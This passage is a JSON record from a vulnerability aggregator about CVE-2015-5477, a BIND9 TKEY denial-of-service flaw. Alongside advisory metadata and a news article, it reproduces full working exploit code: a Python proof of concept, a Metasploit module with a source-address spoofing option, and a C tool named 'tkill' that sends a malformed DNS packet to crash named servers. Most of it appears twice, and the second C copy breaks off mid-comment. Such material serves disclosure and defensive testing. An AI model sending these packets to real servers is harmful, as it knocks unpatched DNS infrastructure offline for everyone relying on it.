"SECURITYVULNS:DOC:32383", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32383", "title": "FreeBSD Security Advisory FreeBSD-SA-15:17.bind", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:01", "bulletinFamily": "software", "description": "Assert on TKEY request processing.", "modified": "2015-08-03T00:00:00", "published": "2015-08-03T00:00:00", "id": "SECURITYVULNS:VULN:14619", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14619", "title": "ISC bind named DoS", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-03-14T06:36:43", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2015-08-05T00:00:00", "published": "2015-08-05T00:00:00", "id": "1337DAY-ID-23970", "href": "https://0day.today/exploit/description/23970", "type": "zdt", "title": "ISC BIND9 TKEY Remote DoS PoC", "sourceData": "# Exploit Title: PoC for BIND9 TKEY DoS\r\n# Exploit Author: elceef\r\n# Software Link: https://github.com/elceef/tkeypoc/\r\n# Version: ISC BIND 9\r\n# Tested on: multiple\r\n# CVE : CVE-2015-5477\r\n \r\n#!/usr/bin/env python\r\n \r\nimport socket\r\nimport sys\r\n \r\nprint('CVE-2015-5477 BIND9 TKEY PoC')\r\n \r\nif len(sys.argv) < 2:\r\n print('Usage: ' + sys.argv[0] + ' [target]')\r\n sys.exit(1)\r\n \r\nprint('Sending packet to ' + sys.argv[1] + ' ...')\r\n \r\npayload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex')) \r\n \r\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\nsock.sendto(payload, (sys.argv[1], 53))\r\n \r\nprint('Done.')\n\n# 0day.today [2018-03-14] #", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23970"}, {"lastseen": "2018-01-06T07:04:09", "bulletinFamily": "exploit", "description": "This module sends a malformed TKEY query, which exploits an error in handling TKEY queries on affected BIND9 'named' DNS servers. As a result, a vulnerable named server will exit with a REQUIRE assertion failure. This condition can be exploited in versions of BIND between BIND 9.1.0 through 9.8.x, 9.9.0 through 9.9.7-P1 and 9.10.0 through 9.10.2-P2.#### Usage Info\nmsf > use auxiliary/dos/dns/bind_tkey\rmsf auxiliary(bind_tkey) > show actions\r...actions...\rmsf auxiliary(bind_tkey) > set ACTION <action-name>\rmsf auxiliary(bind_tkey) > show options\r...show and set options...\rmsf auxiliary(bind_tkey) > run", "modified": "2015-08-04T00:00:00", "published": "2015-08-04T00:00:00", "id": "1337DAY-ID-23960", "href": "https://0day.today/exploit/description/23960", "type": "zdt", "title": "BIND9 TKEY Query Denial of Service Exploit", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit4 < Msf::Auxiliary\r\n\r\n include Msf::Exploit::Capture\r\n include Msf::Auxiliary::UDPScanner\r\n include Msf::Auxiliary::Dos\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'BIND TKEY Query Denial of Service',\r\n 'Description' => %q{\r\n This module sends a malformed TKEY query, which exploits an\r\n error in handling TKEY queries on affected BIND9 'named' DNS servers.\r\n As a result, a vulnerable named server will exit with a REQUIRE\r\n assertion failure. This condition can be exploited in versions of BIND\r\n between BIND 9.1.0 through 9.8.x, 9.9.0 through 9.9.7-P1 and 9.10.0\r\n through 9.10.2-P2.\r\n },\r\n 'Author' => [\r\n 'Jonathan Foote', # Original discoverer\r\n 'throwawayokejxqbbif', # PoC\r\n 'wvu' # Metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2015-5477'],\r\n ['URL', 'https://www.isc.org/blogs/cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/'],\r\n ['URL', 'https://kb.isc.org/article/AA-01272'],\r\n ['URL', 'https://github.com/rapid7/metasploit-framework/issues/5790']\r\n ],\r\n 'DisclosureDate' => 'Jul 28 2015',\r\n 'License' => MSF_LICENSE,\r\n 'DefaultOptions' => {'ScannerRecvWindow' => 0}\r\n ))\r\n\r\n register_options([\r\n Opt::RPORT(53),\r\n OptAddress.new('SRC_ADDR', [false, 'Source address to spoof', nil])\r\n ])\r\n\r\n deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')\r\n end\r\n\r\n def scan_host(ip)\r\n if datastore['SRC_ADDR']\r\n scanner_spoof_send(payload, ip, rport, datastore['SRC_ADDR'])\r\n else\r\n print_status(\"Sending packet to #{ip}\")\r\n scanner_send(payload, ip, rport)\r\n end\r\n end\r\n\r\n def payload\r\n name = Rex::Text.rand_text_alphanumeric(rand(42) + 1)\r\n txt = Rex::Text.rand_text_alphanumeric(rand(42) + 1)\r\n\r\n name_length = [name.length].pack('C')\r\n txt_length = [txt.length].pack('C')\r\n data_length = [txt.length + 1].pack('n')\r\n ttl = [rand(2 ** 31 - 1) + 1].pack('N')\r\n\r\n query = \"\\x00\\x00\" # Transaction ID: 0x0000\r\n query << \"\\x00\\x00\" # Flags: 0x0000 Standard query\r\n query << \"\\x00\\x01\" # Questions: 1\r\n query << \"\\x00\\x00\" # Answer RRs: 0\r\n query << \"\\x00\\x00\" # Authority RRs: 0\r\n query << \"\\x00\\x01\" # Additional RRs: 1\r\n\r\n query << name_length # [Name Length]\r\n query << name # Name\r\n query << \"\\x00\" # [End of name]\r\n query << \"\\x00\\xf9\" # Type: TKEY (Transaction Key) (249)\r\n query << \"\\x00\\x01\" # Class: IN (0x0001)\r\n\r\n query << name_length # [Name Length]\r\n query << name # Name\r\n query << \"\\x00\" # [End of name]\r\n query << \"\\x00\\x10\" # Type: TXT (Text strings) (16)\r\n query << \"\\x00\\x01\" # Class: IN (0x0001)\r\n query << ttl # Time to live\r\n query << data_length # Data length\r\n query << txt_length # TXT Length\r\n query << txt # TXT\r\n end\r\n\r\nend\n\n# 0day.today [2018-01-06] #", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23960"}, {"lastseen": "2018-02-19T23:28:39", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2015-08-01T00:00:00", "published": "2015-08-01T00:00:00", "id": "1337DAY-ID-23948", "href": "https://0day.today/exploit/description/23948", "type": "zdt", "title": "BIND9 - TKEY PoC Exploit", "sourceData": "/*\r\n PoC for BIND9 TKEY assert Dos (CVE-2015-5477)\r\n \r\n Usage:\r\n tkill <hostname>\r\n \r\n What it does:\r\n - First sends a \"version\" query to see if the server is up.\r\n - Regardless of the version response, it then sends the DoS packet.\r\n - Then it waits 5 seconds for a response. If the server crashes,\r\n there will be no response.\r\n \r\n Notes:\r\n - multiple hostnames can be specified on the command-line\r\n - IP addresses can be specified instead of hostnames\r\n - supports IPv4 and IPv6\r\n - runs on Linux, Mac, and Windows (cygwin or VisualStudio)\r\n - if a hostname resolves to more than one IP, then all IPs\r\n will be probed\r\n \r\n About the vuln:\r\n For control information, the \"TSIG\" feature allows packets to be\r\n signed with a password. This allows slave servers to get updates\r\n from master servers without a MitM attack (like from the NSA)\r\n changing the data on the network.\r\n \r\n A password can be distributed out of band, such as SSHing into\r\n a box and editing the configuration file. Anther way is through\r\n public-keys. That's the \"TKEY\" feature: it distributes new\r\n TSIG passwords using public-keys.\r\n \r\n When processing a TKEY packet, the code will call a function to\r\n fetch the proper TKEY record. It looks in two places: the\r\n \"answer records\" section, and the \"additional records\" section.\r\n If it can't find it in the \"additional\", it looks in \"answer\".\r\n \r\n The lookup function takes a parameter that is initially set\r\n to NULL. During the failed lookup in the \"additional\" section,\r\n it may set that parameter to a non-null value. Since a non-null\r\n value is passed in again during the second lookup in the \"answer\"\r\n section, the code crashes.\r\n \r\n The patch was to set the variable to NULL before the second lookup.\r\n \r\n The correct fix would simply not check to see if the parameter\r\n was NULL to be begin with. It's an out-only parameter, so it's value\r\n on input doesn't matter.\r\n \r\n This is a just a \"brainfart\" bug that can only result in a crash\r\n of the server. It cann't result in data-corruption or code\r\n execution.\r\n \r\n About this code:\r\n To learn about writing network code, this is probably something useful\r\n to study.\r\n \r\n It works on both Windows and Unix (Linux, Mac, etc.). You can see where\r\n the differences are between the two platforms, as well as the simularities.\r\n \r\n It works on both IPv4 and IPv6. However, if you search through the code,\r\n you'll find nothing that specifically references either version. It's\r\n magically dual-stack. That's because it uses new functions like\r\n \"getaddrinfo()\" instead of old functions like \"gethostbyname()\".\r\n \r\nSource: https://raw.githubusercontent.com/robertdavidgraham/cve-2015-5477/master/tkill.c\r\n*/\r\n \r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <ctype.h>\r\n \r\n#ifdef WIN32\r\n#include <winsock2.h>\r\n#include <ws2tcpip.h>\r\n#pragma comment(lib, \"Ws2_32.lib\")\r\n#define WSA(err) (WSA##err)\r\n#define WSAEAGAIN WSAETIMEDOUT\r\n#else\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netdb.h>\r\n#include <arpa/inet.h>\r\n#include <errno.h>\r\n#define WSAGetLastError() (errno)\r\n#define WSA(err) (err)\r\n#define closesocket(fd) close(fd)\r\n#endif\r\n \r\n/*\r\n * DoS packet that will crash server\r\n */\r\nstatic const unsigned char dospacket[] = {\r\n 0x01, 0x02, /* xid */\r\n 0x01, 0x00, /* query */\r\n 0x00, 0x01, /* one question */\r\n 0x00, 0x00, /* no answer */\r\n 0x00, 0x00, /* no authorities */\r\n 0x00, 0x01, /* one additional: must be 'additional' section to work*/\r\n \r\n /* Query name */\r\n 0x03, 'f', 'o', 'o', 0x03, 'b', 'a', 'r', 0x00,\r\n 0x00, 249, /* TKEY record type */\r\n 0x00, 255,\r\n \r\n /* Additional record */\r\n 0x03, 'f', 'o', 'o', 0x03, 'b', 'a', 'r', 0x00, /* name: must be same as query */\r\n 0x00, 16, /* record type: must NOT be 249/TKEY */\r\n 0x00, 255,\r\n 0, 0, 0, 0,\r\n 0, 51,\r\n 50,\r\n 'h', 't', 't', 'p', 's', ':', '/', '/', \r\n 'g', 'i', 't', 'h', 'u', 'b', '.', 'c', \r\n 'o', 'm', '/', 'r', 'o', 'b', 'e', 'r', \r\n 't', 'd', 'a', 'v', 'i', 'd', 'g', 'r', \r\n 'a', 'h', 'a', 'm', '/', 'c', 'v', 'e', \r\n '-', '2', '0', '1', '5', '-', '5', '4', \r\n '7', '7'\r\n};\r\n \r\n \r\n/*\r\n * Packet for querying the version of the server, to test if it's up\r\n */\r\nstatic const unsigned char versionpacket[] = {\r\n 0x03, 0x04, /* xid */\r\n 0x01, 0x00, /* query */\r\n 0x00, 0x01, /* one question */\r\n 0x00, 0x00, /* no answer */\r\n 0x00, 0x00, /* no authorities */\r\n 0x00, 0x00, /* no additional */\r\n \r\n /* Query name */\r\n 0x07, 'v', 'e', 'r', 's', 'i', 'o', 'n', 0x04, 'b', 'i', 'n', 'd', 0x00,\r\n 0x00, 16, /* TXT */\r\n 0x00, 3, /* CHOAS */\r\n};\r\n \r\n \r\n/*\r\n * YOLO BIND version.bind query\r\n */\r\nint query_version(int fd, const struct addrinfo *target)\r\n{\r\n int bytes_received;\r\n int i;\r\n struct sockaddr_storage from;\r\n socklen_t sizeof_from = sizeof(from);\r\n char hostname[256];\r\n unsigned char buf[2048];\r\n int result = 0;\r\n \r\n /* \r\n * Query version \r\n */\r\n sendto(fd, (const char*)versionpacket, sizeof(versionpacket), 0, \r\n target->ai_addr, target->ai_addrlen);\r\n \r\n \r\n /* \r\n * get response \r\n */\r\nagain:\r\n bytes_received = recvfrom(fd, (char*)buf, sizeof(buf), 0, (struct sockaddr*)&from, &sizeof_from);\r\n if (bytes_received <= 0 && WSAGetLastError() == WSA(EAGAIN)) {\r\n fprintf(stderr, \"[-] timed out getting version, trying again\\n\");\r\n return 0;\r\n } else if (bytes_received <= 0) {\r\n fprintf(stderr, \"[-] unknown error receiving response: %u\\n\", WSAGetLastError());\r\n return 0;\r\n }\r\n getnameinfo((struct sockaddr*)&from, sizeof(from), hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);\r\n \r\n /* \r\n * parse response \r\n */\r\n if (bytes_received < 12)\r\n goto again;\r\n if (buf[0] != versionpacket[0] && buf[1] != versionpacket[1])\r\n goto again;\r\n if ((buf[2]&0x80) != 0x80)\r\n goto again;\r\n \r\n /*\r\n * Handle respoonse code \r\n */\r\n switch (buf[3]&0x0F) {\r\n case 0:\r\n /* parse packet below */\r\n break;\r\n case 1:\r\n fprintf(stderr, \"[-] %s: FORMERR\\n\", hostname);\r\n return 1;\r\n case 2:\r\n fprintf(stderr, \"[-] %s: SRVFAIL\\n\", hostname);\r\n return 1;\r\n case 3:\r\n fprintf(stderr, \"[-] %s: NAMERR\\n\", hostname);\r\n return 1;\r\n case 4:\r\n fprintf(stderr, \"[-] %s: NOTIMPL\\n\", hostname);\r\n return 1;\r\n case 5:\r\n fprintf(stderr, \"[-] %s: REFUSED\\n\", hostname);\r\n return 1;\r\n default:\r\n fprintf(stderr, \"[-] %s: unknown error: %u\\n\", hostname, buf[3]);\r\n return 1;\r\n }\r\n \r\n \r\n i = 12; /* skip header */\r\n \r\n /* \r\n * skip query name \r\n */\r\n while (i < bytes_received) {\r\n if (buf[i] == 0) {\r\n i++;\r\n break;\r\n } else if ((buf[i] & 0xC0) == 0xC0) {\r\n i += 2;\r\n break;\r\n } else {\r\n i += buf[i] + 1;\r\n }\r\n }\r\n i += 4;\r\n \r\n /* \r\n * process all answers \r\n */\r\n while (i + 12 <= bytes_received) {\r\n int t, c, len;\r\n \r\n /* skip answer name */\r\n while (i < bytes_received) {\r\n if (buf[i] == 0) {\r\n i++;\r\n break;\r\n } else if ((buf[i] & 0xC0) == 0xC0) {\r\n i += 2;\r\n break;\r\n } else {\r\n i += buf[i] + 1;\r\n }\r\n }\r\n \r\n /* extract resource-recorder header */\r\n if (i + 10 > bytes_received)\r\n break;\r\n t = buf[i+0]<<8 | buf[i+1];\r\n c = buf[i+2]<<8 | buf[i+3];\r\n len = buf[i+8]<<8 | buf[i+9];\r\n i += 10;\r\n \r\n /* verify TXT CHAOS */\r\n if (t != 16 || c != 3) {\r\n i += len;\r\n continue;\r\n }\r\n \r\n /* fix len */\r\n if (len > bytes_received - i)\r\n len = bytes_received - i;\r\n \r\n /* print the hostname */\r\n fprintf(stderr, \"[+] %s: \", hostname);\r\n \r\n /* print the strings */\r\n {\r\n int j = i;\r\n \r\n i += len;\r\n \r\n while (j < i) {\r\n int len2 = buf[j];\r\n int k;\r\n j++;\r\n if (len2 > bytes_received - len2)\r\n len2 = bytes_received - len2;\r\n fprintf(stderr, \"\\\"\");\r\n \r\n for (k=j; k<j+len2; k++) {\r\n if (buf[k] == '\\\\')\r\n fprintf(stderr, \"\\\\\");\r\n else if (!isprint(buf[k]))\r\n fprintf(stderr, \"\\\\x%02x\", buf[k]);\r\n else\r\n fprintf(stderr, \"%c\", buf[k]);\r\n }\r\n \r\n j = k;\r\n \r\n fprintf(stderr, \"\\\" \");\r\n }\r\n fprintf(stderr, \"\\n\");\r\n }\r\n result = 1;\r\n }\r\n return result;\r\n}\r\n \r\n/*\r\n * Send the DoS packet\r\n */\r\nvoid probe(const struct addrinfo *target)\r\n{\r\n int fd;\r\n int x;\r\n int i;\r\n char hostname[256];\r\n char buf[2048];\r\n struct sockaddr_storage from;\r\n socklen_t sizeof_from = sizeof(from);\r\n \r\n \r\n /*\r\n * Print status\r\n */\r\n getnameinfo(target->ai_addr, target->ai_addrlen, hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);\r\n fprintf(stderr, \"[+] %s: Probing...\\n\", hostname);\r\n \r\n /*\r\n * Create a socket\r\n */\r\n fd = socket(target->ai_family, SOCK_DGRAM, 0);\r\n if (fd <= 0) {\r\n fprintf(stderr, \"[-] failed: socket(): %u\\n\", WSAGetLastError());\r\n return;\r\n }\r\n \r\n /*\r\n * Set the timeout to 5-seconds\r\n */\r\n {\r\n#ifdef WIN32\r\n int milliseconds = 5000;\r\n x = setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, (char*)&milliseconds, sizeof(milliseconds));\r\n#else\r\n struct timeval t;\r\n t.tv_sec = 5;\r\n t.tv_usec = 0;\r\n x = setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, (char*)&t, sizeof(t));\r\n#endif\r\n \r\n if (x != 0) {\r\n fprintf(stderr, \"[-] err setting recv timeout: %u\\n\", WSAGetLastError());\r\n }\r\n }\r\n \r\n \r\n /*\r\n * First, query the server to grab its version, but also to see it's up\r\n */\r\n fprintf(stderr, \"[+] Querying version...\\n\");\r\n for (i=0; i<3; i++) {\r\n if (query_version(fd, target))\r\n break;\r\n if (i == 2) {\r\n fprintf(stderr, \"[-] Can't query server, is it crashed already?\\n\");\r\n fprintf(stderr, \"[-] Sending exploit anyway.\\n\");\r\n }\r\n }\r\n \r\n \r\n /*****************\r\n * SEND DoS PACKET\r\n *****************/\r\n fprintf(stderr, \"[+] Sending DoS packet...\\n\");\r\n sendto(fd, (const char*)dospacket, sizeof(dospacket), 0, target->ai_addr, target->ai_addrlen);\r\n \r\n /* Grab response */\r\n fprintf(stderr, \"[+] Waiting 5-sec for response...\\n\");\r\n for (;;) {\r\n x = recvfrom(fd, (char*)buf, sizeof(buf), 0, (struct sockaddr*)&from, &sizeof_from);\r\n if (x <= 0 && WSAGetLastError() == WSA(EAGAIN)) {\r\n fprintf(stderr, \"[+] timed out, probably crashed\\n\");\r\n break;\r\n } else if (x <= 0) {\r\n fprintf(stderr, \"[-] unknown error receiving response: %u\\n\", WSAGetLastError());\r\n break;;\r\n }\r\n \r\n if (x > 2 && (buf[0] != dospacket[0] || buf[1] != dospacket[1]))\r\n continue;\r\n \r\n getnameinfo((struct sockaddr*)&from, sizeof(from), hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);\r\n fprintf(stderr, \"[-] %s: got response, so probably not vulnerable\\n\", hostname);\r\n break;\r\n }\r\n \r\n \r\n closesocket(fd);\r\n}\r\n \r\n \r\n/*\r\n * The main function just parses the arguments and looks up IP addrsses\r\n * before calling the \"probe\" function to actually exploit the targets\r\n */\r\nint main(int argc, char *argv[])\r\n{\r\n int i;\r\n \r\n#ifdef WIN32\r\n {WSADATA x; WSAStartup(0x101, &x);}\r\n#endif\r\n \r\n fprintf(stderr, \"--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---\\n\");\r\n \r\n if (argc <= 1) {\r\n fprintf(stderr, \"[-] no host specified\\n\");\r\n fprintf(stderr, \"usage:\\n tkill <hostname>\\n\");\r\n return -1;\r\n }\r\n \r\n \r\n /*\r\n * Query all targets specified on the command line\r\n */\r\n for (i=1; i<argc; i++) {\r\n const char *hostname = argv[i];\r\n struct addrinfo *info;\r\n struct addrinfo *target;\r\n char oldtarget[256] = \"\";\r\n int x;\r\n \r\n /*\r\n * Lookup the name of the target\r\n */\r\n fprintf(stderr, \"[+] %s: Resolving to IP address\\n\", hostname);\r\n x = getaddrinfo(hostname, \"53\", 0, &info);\r\n if (x != 0) {\r\n fprintf(stderr, \"[-] %s: failed: %s\\n\", hostname, gai_strerror(x));\r\n continue;\r\n }\r\n \r\n if (info->ai_next) {\r\n fprintf(stderr, \"[+] %s: Resolved to multiple IPs (NOTE)\\n\", hostname);\r\n }\r\n \r\n /*\r\n * Since a name can return multiple IP addresses,\r\n * send a probe to all the results\r\n */\r\n for (target=info; target; target = target->ai_next) {\r\n char newtarget[256];\r\n \r\n /* bah, stupid bug in Linux gets the same target multiple\r\n * times */\r\n getnameinfo(target->ai_addr, target->ai_addrlen, newtarget, sizeof(newtarget), NULL, 0, NI_NUMERICHOST);\r\n if (strcmp(newtarget, oldtarget) == 0)\r\n continue;\r\n memcpy(oldtarget, newtarget, sizeof(oldtarget));\r\n \r\n probe(target);\r\n printf(\"\\n\");\r\n }\r\n \r\n /*\r\n * Cleanup\r\n */\r\n freeaddrinfo(info);\r\n }\r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-02-19] #", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23948"}], "threatpost": [{"lastseen": "2018-10-06T22:56:29", "bulletinFamily": "info", "description": "The maintainers of BIND have patched a critical remotely exploitable vulnerability in the DNS software that can be used in a denial-of-service attack. The vulnerability affects all versions of BIND from 9.1.0 through 9.9.7.\n\nThe vulnerability is in the way that BIND handles certain queries related to transaction key records. The bug is fixed in BIND versions 9.9.7-P2 and P3.\n\n\u201cAn error in the handling of TKEY queries can be exploited by an attacker for use as a denial-of-service vector, as a constructed packet can use the defect to trigger a REQUIRE assertion failure, causing BIND to exit,\u201d the [advisory](<https://www.isc.org/blogs/cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/>) from the Internet Systems Consortium, which maintains BIND, says.\n\n\u201cBoth recursive and authoritative servers are vulnerable to this defect. Additionally, exposure is not prevented by either ACLs or configuration options limiting or denying service because the exploitable code occurs early in the packet handling, before checks enforcing those boundaries.\u201d\n\nBIND is the most widely deployed name server software on the Internet and The TKEY flaw is an especially problematic one for administrators running name servers, as the ISC says there is no real workaround and defending against the bug can be quite difficult.\n\n\u201cMany of our bugs are limited in scope or affect only users having a particular set of configuration choices. CVE-2015-5477 does not fall into that category. Almost all unpatched BIND servers are potentially vulnerable. We know of no configuration workarounds. Screening the offending packets with firewalls is likely to be difficult or impossible unless those devices understand DNS at a protocol level and may be problematic even then. And the fix for this defect is very localized to one specific area of the BIND code,\u201d Michael McNally said in a special [note](<https://www.isc.org/blogs/about-cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/>) on the vulnerability.\n\nMcNally added that there\u2019s a good possibility that practical attacks against CVE-2015-5477 will emerge in short order.\n\n\u201cThe practical effect of this is that this bug is difficult to defend against (except by patching, which is completely effective) and will not be particularly difficult to reverse-engineer. I have already been told by one expert that they have successfully reverse-engineered an attack kit from what has been divulged and from analyzing the code changes, and while I have complete confidence that the individual who told me this is not intending to use his kit in a malicious manner, there are others who will do so who may not be far behind,\u201d McNally said.\n\nThe ISC has released the two new versions to fix the TKEY vulnerability. There is also a second security fix in the new versions, though it\u2019s less serious than the TKEY bug.\n\n\u201cOn servers configured to perform DNSSEC validation, an assertion failure could be triggered on answers from a specially configured server,\u201d the [BIND release notes](<https://kb.isc.org/article/AA-01279>) say.\n", "modified": "2015-08-04T15:54:09", "published": "2015-07-29T09:09:28", "id": "THREATPOST:345F6C411E78E96A9B0A921D21729C65", "href": "https://threatpost.com/critical-remotely-exploitable-bug-haunts-bind/114008/", "type": "threatpost", "title": "Critical Remotely Exploitable Bug Haunts BIND", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-04T06:27:15", "bulletinFamily": "exploit", "description": "ISC BIND9 TKEY Remote DoS PoC. CVE-2015-5477. Dos exploits for multiple platform", "modified": "2015-08-05T00:00:00", "published": "2015-08-05T00:00:00", "id": "EDB-ID:37723", "href": "https://www.exploit-db.com/exploits/37723/", "type": "exploitdb", "title": "ISC BIND9 TKEY Remote DoS PoC", "sourceData": "# Exploit Title: PoC for BIND9 TKEY DoS\r\n# Exploit Author: elceef\r\n# Software Link: https://github.com/elceef/tkeypoc/\r\n# Version: ISC BIND 9\r\n# Tested on: multiple\r\n# CVE : CVE-2015-5477\r\n\r\n#!/usr/bin/env python\r\n\r\nimport socket\r\nimport sys\r\n\r\nprint('CVE-2015-5477 BIND9 TKEY PoC')\r\n\r\nif len(sys.argv) < 2:\r\n\tprint('Usage: ' + sys.argv[0] + ' [target]')\r\n\tsys.exit(1)\r\n\r\nprint('Sending packet to ' + sys.argv[1] + ' ...')\r\n\r\npayload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex')) \r\n\r\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\nsock.sendto(payload, (sys.argv[1], 53))\r\n\r\nprint('Done.')\r\n\r\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/37723/"}, {"lastseen": "2016-02-04T06:26:57", "bulletinFamily": "exploit", "description": "BIND9 - TKEY PoC. CVE-2015-5477. Dos exploits for multiple platform", "modified": "2015-08-01T00:00:00", "published": "2015-08-01T00:00:00", "id": "EDB-ID:37721", "href": "https://www.exploit-db.com/exploits/37721/", "type": "exploitdb", "title": "BIND9 - TKEY PoC", "sourceData": "/*\r\n PoC for BIND9 TKEY assert Dos (CVE-2015-5477)\r\n\r\n Usage:\r\n tkill <hostname>\r\n\r\n What it does:\r\n - First sends a \"version\" query to see if the server is up.\r\n - Regardless of the version response, it then sends the DoS packet.\r\n - Then it waits 5 seconds for a response. If the server crashes,\r\n there will be no response.\r\n\r\n Notes:\r\n - multiple hostnames can be specified on the command-line\r\n - IP addresses can be specified instead of hostnames\r\n - supports IPv4 and IPv6\r\n - runs on Linux, Mac, and Windows (cygwin or VisualStudio)\r\n - if a hostname resolves to more than one IP, then all IPs\r\n will be probed\r\n\r\n About the vuln:\r\n For control information, the \"TSIG\" feature allows packets to be\r\n signed with a password. This allows slave servers to get updates\r\n from master servers without a MitM attack (like from the NSA)\r\n changing the data on the network.\r\n\r\n A password can be distributed out of band, such as SSHing into\r\n a box and editing the configuration file. Anther way is through\r\n public-keys. That's the \"TKEY\" feature: it distributes new\r\n TSIG passwords using public-keys.\r\n\r\n When processing a TKEY packet, the code will call a function to\r\n fetch the proper TKEY record. It looks in two places: the\r\n \"answer records\" section, and the \"additional records\" section.\r\n If it can't find it in the \"additional\", it looks in \"answer\".\r\n\r\n The lookup function takes a parameter that is initially set\r\n to NULL. During the failed lookup in the \"additional\" section,\r\n it may set that parameter to a non-null value. Since a non-null\r\n value is passed in again during the second lookup in the \"answer\"\r\n section, the code crashes.\r\n\r\n The patch was to set the variable to NULL before the second lookup.\r\n\r\n The correct fix would simply not check to see if the parameter\r\n was NULL to be begin with. It's an out-only parameter, so it's value\r\n on input doesn't matter.\r\n\r\n This is a just a \"brainfart\" bug that can only result in a crash\r\n of the server. It cann't result in data-corruption or code\r\n execution.\r\n\r\n About this code:\r\n To learn about writing network code, this is probably something useful\r\n to study.\r\n\r\n It works on both Windows and Unix (Linux, Mac, etc.). You can see where\r\n the differences are between the two platforms, as well as the simularities.\r\n\r\n It works on both IPv4 and IPv6. However, if you search through the code,\r\n you'll find nothing that specifically references either version. It's\r\n magically dual-stack. That's because it uses new functions like\r\n \"getaddrinfo()\" instead of old functions like \"gethostbyname()\".\r\n \r\nSource: https://raw.githubusercontent.com/robertdavidgraham/cve-2015-5477/master/tkill.c\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <ctype.h>\r\n\r\n#ifdef WIN32\r\n#include <winsock2.h>\r\n#include <ws2tcpip.h>\r\n#pragma comment(lib, \"Ws2_32.lib\")\r\n#define WSA(err) (WSA##err)\r\n#define WSAEAGAIN WSAETIMEDOUT\r\n#else\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netdb.h>\r\n#include <arpa/inet.h>\r\n#include <errno.h>\r\n#define WSAGetLastError() (errno)\r\n#define WSA(err) (err)\r\n#define closesocket(fd) close(fd)\r\n#endif\r\n\r\n/*\r\n * DoS packet that will crash server\r\n */\r\nstatic const unsigned char dospacket[] = {\r\n 0x01, 0x02, /* xid */\r\n 0x01, 0x00, /* query */\r\n 0x00, 0x01, /* one question */\r\n 0x00, 0x00, /* no answer */\r\n 0x00, 0x00, /* no authorities */\r\n 0x00, 0x01, /* one additional: must be 'additional' section to work*/\r\n\r\n /* Query name */\r\n 0x03, 'f', 'o', 'o', 0x03, 'b', 'a', 'r', 0x00,\r\n 0x00, 249, /* TKEY record type */\r\n 0x00, 255,\r\n\r\n /* Additional record */\r\n 0x03, 'f', 'o', 'o', 0x03, 'b', 'a', 'r', 0x00, /* name: must be same as query */\r\n 0x00, 16, /* record type: must NOT be 249/TKEY */\r\n 0x00, 255,\r\n 0, 0, 0, 0,\r\n 0, 51,\r\n 50,\r\n 'h', 't', 't', 'p', 's', ':', '/', '/', \r\n 'g', 'i', 't', 'h', 'u', 'b', '.', 'c', \r\n 'o', 'm', '/', 'r', 'o', 'b', 'e', 'r', \r\n 't', 'd', 'a', 'v', 'i', 'd', 'g', 'r', \r\n 'a', 'h', 'a', 'm', '/', 'c', 'v', 'e', \r\n '-', '2', '0', '1', '5', '-', '5', '4', \r\n '7', '7'\r\n};\r\n\r\n\r\n/*\r\n * Packet for querying the version of the server, to test if it's up\r\n 